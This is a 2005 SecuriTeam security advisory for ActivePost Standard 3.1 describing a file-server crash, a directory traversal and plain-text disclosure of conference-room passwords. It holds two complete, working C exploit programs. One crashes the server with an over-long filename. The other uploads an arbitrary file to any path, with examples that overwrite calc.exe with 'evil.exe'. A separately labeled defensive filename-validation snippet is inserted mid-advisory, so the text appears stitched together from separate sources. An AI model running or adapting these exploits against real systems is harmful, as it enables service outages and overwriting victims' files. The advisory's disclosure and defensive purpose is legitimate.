[NT] ActivePost Standard Password Disclosure, Directory Traversal and DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05
To: list@securiteam.com Date: 4 May 2005 18:32:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
ActivePost Standard Password Disclosure, Directory Traversal and DoS
------------------------------------------------------------------------
SUMMARY
<http://www.activepost.net/> ActivePost Standard is a conference
communication program for companies. It consists of client programs and
a central server used for login, messaging, chat, file transfer and
conferences. - "ActivePOST is a realtime messaging system that is combined
with Messenger, FileBox, Audio/Video Conference and interface with
GROUPWARE"
Multiple vulnerabilities exist in ActivePOST; exploiting them allows a
malicious attacker to gather valuable information about the system and to
crash the program's service.
DETAILS
Vulnerable Systems:
* ActivePost Standard versions 3.1 and prior
Denial of Service:
The file-server listens on port 6004 and is used to upload files to the
server so that they can then be downloaded by the target users. The
vulnerability stems from the fact that an attacker can crash the
file-server by supplying a filename longer than 4074 characters.
Directory Traversal:
This is the most critical vulnerability, as it lets an attacker upload
malicious files anywhere on the disk on which ActivePost was installed,
by exploiting a directory traversal bug in the handling of the filename.
Example:
The following filename will overwrite the calc.exe file:
/../../../windows/calc.exe
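The two file-server problems above (a filename over 4074 characters, and "/.." traversal in the filename) are both failures to validate the 0x1f6 "filename" frame before using it as a path. The following is an added example, not code from the advisory or its author, of the server-side check that would reject both; it assumes the frame layout shown in the proof-of-concept code (4-byte message type, 4-byte length, NUL-terminated filename from offset 8, 4104-byte frame) and treats the advisory's 4074 figure as the length limit.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define AP_BUFFSZ   4104   /* frame size the file-server exchanges, as in the PoC */
#define AP_HDR      8      /* 4-byte message type + 4-byte length; filename follows */
#define AP_MSG_NAME 0x1f6  /* "filename" message type used in the PoC */
#define AP_MAXNAME  4074   /* assumed limit: longest name the advisory says the server survives */

static uint32_t rd32le(const unsigned char *p) {
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void reason(char *why, size_t sz, const char *s) {
    if (why && sz) snprintf(why, sz, "%s", s);
}

/* A name is unsafe if it is absolute, carries a drive letter, or has a ".."
 * run at the start or right after a separator. This covers "/../", "\..",
 * and the "/...." variant mentioned in the PoC usage text. */
static int name_is_safe(const char *name) {
    if (name[0] == '/' || name[0] == '\\' || (name[0] && name[1] == ':')) return 0;
    for (const char *p = name; *p; p++)
        if ((p == name || p[-1] == '/' || p[-1] == '\\') && p[0] == '.' && p[1] == '.')
            return 0;
    return 1;
}

/* Validate one 0x1f6 frame. Returns 0 (accept) or -1 (reject, reason in why). */
int ap_check_filename_frame(const unsigned char *frame, size_t n, char *why, size_t whysz) {
    if (n != AP_BUFFSZ) { reason(why, whysz, "bad frame size"); return -1; }
    if (rd32le(frame) != AP_MSG_NAME) { reason(why, whysz, "not a filename frame"); return -1; }
    const char *name = (const char *)frame + AP_HDR;
    const char *nul = memchr(name, 0, n - AP_HDR);
    if (!nul) { reason(why, whysz, "filename not NUL-terminated"); return -1; }
    size_t len = (size_t)(nul - name);
    if (len == 0) { reason(why, whysz, "empty filename"); return -1; }
    if (len > AP_MAXNAME) { reason(why, whysz, "filename too long"); return -1; }
    if (!name_is_safe(name)) { reason(why, whysz, "path traversal in filename"); return -1; }
    reason(why, whysz, "ok");
    return 0;
}

/* Convenience for tests: pack a name into a constructed 0x1f6 frame and check it. */
int ap_check_name(const char *name, char *why, size_t whysz) {
    unsigned char frame[AP_BUFFSZ] = {0};
    frame[0] = AP_MSG_NAME & 0xff; frame[1] = AP_MSG_NAME >> 8;  /* little-endian type */
    size_t len = strlen(name);
    if (len > AP_BUFFSZ - AP_HDR - 1) len = AP_BUFFSZ - AP_HDR - 1;  /* always keep a NUL */
    memcpy(frame + AP_HDR, name, len);
    return ap_check_filename_frame(frame, sizeof frame, why, whysz);
}
```

A real server would additionally canonicalise the joined path and confirm it still lies under the upload directory, since a lexical check alone does not cover symlinks or platform-specific path quirks.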
Conference Password Disclosure:
Every time a user enters the conference menu, the server sends all the
information about the available rooms, including the plain-text passwords
of the conference rooms that are password protected.
The following is example data received from the server:
4703 0000 0000 0000 0000 0000 0000 0000 G...............
0000 0000 0a72 6f6f 6d20 7469 746c 6500 .....room title.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0001 3100 ..............1.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0e73 6563 7265 7470 6173 7377 6f72 ...secretpasswor <===
6400 0000 0000 0000 0000 0000 0000 0000 d...............
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0003 3832 ..............82
3100 0000 0000 0000 0000 0000 0000 0000 1...............
0000 0138 0000 0000 0000 0000 0000 0000 ...8............
0000 0000 0000 0017 6465 7363 7269 7074 ........descript
696f 6e20 6f66 2074 6865 2072 6f6f 6d00 ion of the room.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 ....
Proof of Concept:
ActivePost Denial of Service:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/actpboom.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif
#define VER "0.1"
#define PORT 6004
#define BUFFSZ 4104 /* don't modify! */
#define TIMEOUT 3
#define SEND if(send(sd, buff, BUFFSZ, 0) \
< 0) std_err();
#define RECV for(tot = 0; tot < BUFFSZ; tot += len) { \
len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
if(len < 0) std_err(); \
if(!len) break; \
}
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
tot;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"ActivePost File-Server <= 3.1 crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
memset(buff, 0x00, BUFFSZ);
fputs("- send first header\n", stdout);
*(u_long *)buff = 0x1f5;
SEND;
RECV;
fputs("- send filename (BOOM)\n", stdout);
*(u_long *)buff = 0x1f6;
memset(buff + 8, 'a', BUFFSZ - 8);
SEND;
RECV;
memset(buff, 0x00, BUFFSZ);
fputs("- send file data (none)\n", stdout);
*(u_long *)buff = 0x1f8;
SEND;
fputs("- send final header\n", stdout);
*(u_long *)buff = 0x1f9;
SEND;
if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ActivePost Directory Traversal:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/actpup.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif
#define VER "0.1"
#define PORT 6004
#define BUFFSZ 4104 /* don't modify */
#define SEND if(send(sd, buff, BUFFSZ, 0) \
< 0) std_err();
#define RECV for(tot = 0; tot < BUFFSZ; tot += len) { \
len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
if(len < 0) std_err(); \
if(!len) break; \
}
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
struct sockaddr_in peer;
int sd,
len,
tot;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"ActivePost File-Server <= 3.1 traversal file uploader "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 4) {
printf("\nUsage: %s <local_filename> <remote_filename> <server> [port(%d)]\n"
"\n"
" local_filename is the name of one of your local files that you wanna put on\n"
" the remote server.\n"
" remote_filename instead is the name you wanna give to the file and moreover\n"
" the traversal pattern (/..) to reach the desired path on which to put it.\n"
" Are needed at least 3 patterns to exit from the ActivePost Server folder,\n"
" like /../../../filename or /..../filename\n"
" However don't worry because the complete real remote path on which your file\n"
" is saved is EVER visible in the server reply.\n"
"\n"
" Examples:\n"
" %s evil.exe /../../../windows/calc.exe localhost\n"
" %s evil.exe /..../windows/calc.exe localhost\n"
"\n"
" In this case your file evil.exe will overwrite the calc.exe file of the\n"
" remote host (if ActivePost has been installed in c:\\).\n"
"\n", argv[0], PORT, argv[0], argv[0]);
exit(1);
}
printf("- open local file \"%s\"\n", argv[1]);
fd = fopen(argv[1], "rb");
if(!fd) std_err();
if(argc > 4) port = atoi(argv[4]);
peer.sin_addr.s_addr = resolv(argv[3]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s:%hu\n",
inet_ntoa(peer.sin_addr),
port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
memset(buff, 0x00, BUFFSZ);
fputs("- send first header\n", stdout);
*(u_long *)buff = 0x1f5;
SEND;
RECV;
printf("- send filename (%s)\n", argv[2]);
*(u_long *)buff = 0x1f6;
strncpy(buff + 8, argv[2], BUFFSZ - 8);
SEND;
RECV;
printf("- upload file (%s)\n", argv[1]);
*(u_long *)buff = 0x1f8;
while((len = fread(buff + 8, 1, BUFFSZ - 8, fd))) {
*(u_long *)(buff + 4) = len;
SEND;
}
fclose(fd);
memset(buff, 0x00, BUFFSZ);
fputs("- send final header\n", stdout);
*(u_long *)buff = 0x1f9;
SEND;
RECV;
printf("- remote file has been saved exactly here:\n"
" %s\n", buff + 8);
close(sd);
fputs("- finished\n\n", stdout);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/actp-adv.txt>
http://aluigi.altervista.org